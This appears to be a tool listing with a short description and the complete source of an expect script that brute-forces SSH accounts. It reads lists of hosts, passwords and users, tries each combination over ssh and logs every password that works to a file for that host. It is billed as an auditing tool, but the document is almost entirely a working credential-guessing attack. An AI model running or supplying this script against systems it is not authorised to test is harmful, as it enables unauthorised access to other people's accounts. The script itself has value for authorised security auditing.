55hb is a SSH account brute force auditing tool written in expect. Allows you to specify hosts, password lists, and a user.
0a0c26ff49e9be32c07baf34b748e84956150a706ffab89a9984575b51fbc922
#!/usr/bin/expect -f
#
# Written by James Shanahan(jshanahan@comcastpc.com)
# and Erin Palmer(epalmer@comcastpc.com)
# ssh brute forcer
# This will alow you to specify hosts, password lists, and a user
# I do not take any reponsibilty for what you do with this tool
# Hopefully it will make your life easier rather then making other
# peoples lives more difficult!
set timeout 5
set dictionary [lindex $argv 0]
set file [lindex $argv 1]
set user [lindex $argv 2]
if {[llength $argv] != 3} {
puts stderr "Usage: $argv0 <dictionary-file> <hosts-file> <user-file>\n"
exit }
set tryHost [open $file r]
set tryPass [open $dictionary r]
set tryUser [open $user r]
set passwords [read $tryPass]
set hosts [read $tryHost]
set login [read $tryUser]
foreach username $login {
foreach passwd $passwords {
foreach ip $hosts {
spawn ssh $username@$ip
expect ":"
send "$passwd\n"
set logFile [open $ip.log a]
expect "L" {
puts $logFile "password for $username@$ip is $passwd\n"
close $logFile
}
set id [exp_pid]
exec kill -INT $id
}
}
}